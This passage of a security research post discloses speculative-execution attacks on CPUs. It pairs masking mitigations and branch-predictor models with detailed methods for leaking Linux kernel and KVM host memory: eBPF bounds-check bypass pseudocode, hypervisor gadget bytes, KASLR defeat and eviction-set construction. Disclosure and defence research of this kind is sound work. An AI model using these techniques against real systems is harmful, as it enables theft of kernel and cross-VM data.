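struct array {
    unsigned long length;
    unsigned char data[];
};

static struct array *arr1; /* set up lazily on first lookup */
static struct array *arr2;

static struct array *make_array(unsigned long len)
{
    struct array *a = malloc(sizeof(*a) + len);
    if (!a)
        abort();
    a->length = len;
    memset(a->data, 0, len);
    return a;
}

static void ensure_setup(void)
{
    if (arr1)
        return;
    arr1 = make_array(ARR1_LEN);
    arr2 = make_array(ARR2_LEN);
    for (unsigned long i = 0; i < ARR1_LEN; i++)
        arr1->data[i] = (unsigned char)(i * 7 + 1); /* constructed contents */
}

/* The pattern from the post: correct architecturally, but if the first branch
 * is mis-predicted the processor may read arr1->data[index] out of bounds and
 * then touch a cache line in arr2 selected by that byte. Returns -1 when the
 * index is rejected. */
int lookup_unmasked(unsigned long index)
{
    ensure_setup();
    if (index < arr1->length) {
        unsigned char value = arr1->data[index];
        unsigned long index2 = ((value & 1) * 0x100) + 0x200;
        if (index2 < arr2->length)
            return arr2->data[index2] + value; /* keep both loads live */
    }
    return -1;
}

/* All ones when index < size, all zeros otherwise, computed without a branch
 * so it also holds on a speculative path. Both arguments must be below
 * LONG_MAX. Same construction as Linux's array_index_mask_nospec(). */
unsigned long index_mask_nospec(unsigned long index, unsigned long size)
{
    long x = (long)(index | (size - 1UL - index));
    return (unsigned long)(~x >> (sizeof(long) * 8 - 1));
}

/* Hardened lookup: every index derived from untrusted input is masked after
 * its bounds check, so an out-of-bounds index becomes 0 instead of reaching
 * outside the array while the branch outcome is still being speculated. */
int lookup_masked(unsigned long index)
{
    ensure_setup();
    if (index < arr1->length) {
        index &= index_mask_nospec(index, arr1->length);
        unsigned char value = arr1->data[index];
        unsigned long index2 = ((value & 1) * 0x100) + 0x200;
        if (index2 < arr2->length) {
            index2 &= index_mask_nospec(index2, arr2->length);
            return arr2->data[index2] + value;
        }
    }
    return -1;
}
```

A test can only confirm that the two functions agree architecturally and that the mask is all ones exactly for in-bounds indices; whether the speculative load is suppressed on a given CPU is not observable from the return values.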

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.
Attacking the kernel
This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

either interpreted by an in-kernel bytecode interpreter
or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

Whether the JIT engine is enabled depends on a run-time configuration setting - but at least on the tested Intel processor, the attack works independent of that setting.

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

eBPF's data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn't be a precondition in principle).

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array's length to be slow on other physical CPU cores (intentional false sharing).

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 2^15 adjacent userspace memory mappings [9], each consisting of 2^4 pages, are created at the userspace address user_mapping_area, covering a total area of 2^31 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

This permits the attack to be carried out in steps of 2^31 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 2^4 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

This program reads 8-byte-aligned 64-bit values from an eBPF data array "victim_map" (victim_array in the pseudocode above) at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 2^7 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.
Variant 2: Branch target injection
This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian's distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.
Basics
Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other's branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won't know the true destination of the jump, and it won't be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.
Haswell branch prediction internals
Some of the internals of the branch prediction implemented by Intel's processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

Haswell seems to have multiple branch prediction mechanisms that work very differently:

A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
(There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
Generic predictor
The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn't store the full, absolute destination address.

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

bit A          bit B
0x40.0000      0x2000
0x80.0000      0x4000
0x100.0000     0x8000
0x200.0000     0x1.0000
0x400.0000     0x2.0000
0x800.0000     0x4.0000
0x2000.0000    0x10.0000
0x4000.0000    0x20.0000

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can't distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 2^32 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.
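As an added example (not code from the original post), the folding table and the aliasing examples above can be turned into a small model: the lookup key is the low 31 bits of the source address with each bit A XORed into its partner bit B and then dropped. The model reproduces only what the table states and makes no claim about how the hardware is actually wired; btb_key, btb_aliased and btb_alias_count are constructed names. The alias counter also lets one check the aliasing arithmetic used later in the post for page-aligned load addresses in a given window.

```c
#include <stddef.h>
#include <stdint.h>

/* One row per line of the folding table: bit A is XORed into bit B. */
static const uint32_t fold_pairs[][2] = {
    { 0x400000,   0x2000   },
    { 0x800000,   0x4000   },
    { 0x1000000,  0x8000   },
    { 0x2000000,  0x10000  },
    { 0x4000000,  0x20000  },
    { 0x8000000,  0x40000  },
    { 0x20000000, 0x100000 },
    { 0x40000000, 0x200000 },
};

/* Model of the generic predictor's lookup key for a branch whose last byte is
 * at last_byte_addr: only the low 31 bits are used, then each row is folded. */
uint32_t btb_key(uint64_t last_byte_addr)
{
    uint32_t key = (uint32_t)(last_byte_addr & 0x7fffffffu);
    for (size_t i = 0; i < sizeof(fold_pairs) / sizeof(fold_pairs[0]); i++) {
        uint32_t a = fold_pairs[i][0], b = fold_pairs[i][1];
        if (key & a)
            key ^= b;   /* fold bit A into bit B */
        key &= ~a;      /* bit A itself is no longer part of the key */
    }
    return key;
}

/* Two source addresses alias when the predictor cannot tell them apart. */
int btb_aliased(uint64_t x, uint64_t y)
{
    return btb_key(x) == btb_key(y);
}

/* Number of addresses in [lo, hi) with the given alignment whose key equals
 * that of addr (addr itself is counted when it lies inside the window). */
unsigned long btb_alias_count(uint64_t addr, uint64_t lo, uint64_t hi,
                              uint64_t align)
{
    unsigned long n = 0;
    for (uint64_t a = lo; a < hi; a += align)
        n += (unsigned long)btb_aliased(a, addr);
    return n;
}
```

With this model, the examples in the text come out as stated: 0x100.0000 aliases with 0x140.2000 and 0x180.4000 but not with 0x180.0000 or 0x180.8000, and the two addresses that differ only above bit 31 share a key.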
Indirect call predictor
The inputs of the BTB lookup for this mechanism seem to be:

The low 12 bits of the address of the source instruction (we are not sure whether it's the address of the first or the last byte) or a subset of them.
The branch history buffer state.

If the indirect call predictor can't resolve a branch, it is resolved by the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior."

The branch history buffer (BHB) stores information about the last 29 taken branches - basically a fingerprint of recent control flow - and is used to allow better prediction of indirect calls that can have multiple targets.

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

/* uint58_t is notational: the state is 58 bits wide (29 branches x 2 bits) */
void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
    *bhb_state <<= 2;
    *bhb_state ^= (dst & 0x3f);
    *bhb_state ^= (src & 0xc0) >> 6;
    *bhb_state ^= (src & 0xc00) >> (10 - 2);
    *bhb_state ^= (src & 0xc000) >> (14 - 4);
    *bhb_state ^= (src & 0x30) << (6 - 4);
    *bhb_state ^= (src & 0x300) << (8 - 8);
    *bhb_state ^= (src & 0x3000) >> (12 - 10);
    *bhb_state ^= (src & 0x30000) >> (16 - 12);
    *bhb_state ^= (src & 0xc0000) >> (18 - 14);
}

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn't been understood yet.

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code - for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).
Reverse-Engineering Branch Predictor Internals
This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn't keep a detailed record of what we were doing.

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked - however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to "recent program behavior" in Intel's optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn't influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn't store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

However, a history buffer needs to "forget" about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this cannot cause information in bits that are already present in the history buffer to propagate downwards - and given that, upwards combination of information probably wouldn't be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.
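The following added example (not code from the original post) implements the bhb_update() function from the "Indirect call predictor" section as a runnable model, keeping the 58-bit state in a uint64_t and masking after each shift, and then checks the observations of this section against it: which source and destination bits feed the buffer, that flipping bit 0x1 of the target together with bit 0x40 of the source cancels out, and how many later branches it takes before an earlier branch no longer influences the state. bhb_after, src_bit_matters, dst_bit_matters and branches_until_forgotten are constructed names, and the filler branch addresses are constructed values.

```c
#include <stdint.h>

#define BHB_BITS 58
#define BHB_MASK ((1ULL << BHB_BITS) - 1)

/* The update function from the post; src is the address of the last byte of
 * the branch instruction, dst the destination address. */
uint64_t bhb_update(uint64_t state, uint64_t src, uint64_t dst)
{
    state <<= 2;
    state ^= (dst & 0x3f);
    state ^= (src & 0xc0) >> 6;
    state ^= (src & 0xc00) >> (10 - 2);
    state ^= (src & 0xc000) >> (14 - 4);
    state ^= (src & 0x30) << (6 - 4);
    state ^= (src & 0x300) << (8 - 8);
    state ^= (src & 0x3000) >> (12 - 10);
    state ^= (src & 0x30000) >> (16 - 12);
    state ^= (src & 0xc0000) >> (18 - 14);
    return state & BHB_MASK; /* 58-bit state */
}

/* Take the branch (src, dst) once, then n always-taken filler branches with
 * fixed addresses, as in the bit-flip experiments described above. */
uint64_t bhb_after(uint64_t state, uint64_t src, uint64_t dst, int n)
{
    const uint64_t filler_src = 0x401000, filler_dst = 0x402000; /* constructed */
    state = bhb_update(state, src, dst);
    for (int i = 0; i < n; i++)
        state = bhb_update(state, filler_src, filler_dst);
    return state;
}

/* Does flipping the given bit of the source (or destination) address change
 * the buffer contents? */
int src_bit_matters(unsigned bit)
{
    return bhb_update(0, 0, 0) != bhb_update(0, 1ULL << bit, 0);
}

int dst_bit_matters(unsigned bit)
{
    return bhb_update(0, 0, 0) != bhb_update(0, 0, 1ULL << bit);
}

/* Smallest number of later branches after which a single earlier branch no
 * longer influences the state. */
int branches_until_forgotten(void)
{
    for (int n = 0; n <= 64; n++)
        if (bhb_after(0, 0, 0, n) == bhb_after(0, 0, 1, n))
            return n;
    return -1;
}
```

In the model only source bits 4..19 and destination bits 0..5 reach the buffer, the cancelling pairs (0x1 of the target with 0x40 of the source, 0x2 with 0x80) leave the state unchanged because both land in the same state bit, and an earlier branch is gone after 29 later ones, matching the "last 29 taken branches" figure; the N=25/N=26 threshold measured in the experiments is a lower bound on the same quantity.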
Reading host memory from a KVM guest
Locating the host kernel
Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

lower 20 bits of the address of kvm-intel.ko
full address of kvm.ko
full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section "Reverse-Engineering Branch Predictor Internals", using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section "Generic Predictor" apply; there will be 2^4-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/2^4=1024.

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 2^20) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 2^16 remaining possibilities for the load address of kvm.ko.

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won't actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.
Identifying cache sets
The PoC assumes that the VM does not have access to hugepages. To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they're probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].
Locating the host-virtual address of a guest page
Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used - R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

To brute-force the physical address, the following gadget can be used:

ffffffff810a9def: 4c 89 c0 mov rax,r8
ffffffff810a9df2: 4d 63 f9 movsxd r15,r9d
ffffffff810a9df5: 4e 8b 04 fd c0 b3 a6 mov r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc: 81
ffffffff810a9dfd: 4a 8d 3c 00 lea rdi,[rax+r8*1]
ffffffff810a9e01: 4d 8b a4 00 f8 00 00 mov r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08: 00

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 - the physical address guess minus 0xf8 - is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.
Cache set selection
To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.
Leaking data
At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

The eBPF interpreter entry point has the following function signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed - which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn't matter.

The eBPF interpreter provides, among other things:

multiple emulated 64-bit registers
64-bit immediate writes to emulated registers
memory reads from addresses stored in emulated registers
bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

ffffffff81514edd: 4c 89 ce mov rsi,r9
ffffffff81514ee0: 41 ff 90 b0 00 00 00 call QWORD PTR [r8+0xb0]

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.
Variant 3: Rogue data cache load
Basically, read Anders Fogh's blogpost: https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

We do have a few additions to make to Anders Fogh's blogpost:

"Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, [...]"

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

"First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1."

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

"Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed."

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.
Ideas for further research
We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost - it contains untested ideas that might well be useless.
Leaking without data cache timing
It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.
Other microarchitectures
Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.
Other JIT engines
We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical - in particular, JavaScript engines.
More efficient scanning for host-virtual addresses and cache sets
In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

The same might work for cache sets - use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.
Dumping the complete BTB state
Given that the generic BTB seems to only be able to distinguish 2^31-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

The source address aliasing would reduce the usefulness somewhat, but because target addresses don't suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.
Variant 2: Leaking with more efficient gadgets
If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.
Various speedups
In particular the variant 2 PoC is still a bit slow. This is probably partly because:

It only leaks one bit at a time; leaking more bits at a time should be doable.
It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.
Leaking or injection through the return predictor
If the return predictor also doesn't lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn't reloaded before the return instruction).

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.
Leaking data out of the indirect call predictor
We have attempted to leak target information out of the indirect call predictor, but haven't been able to make it work.
Vendor statements
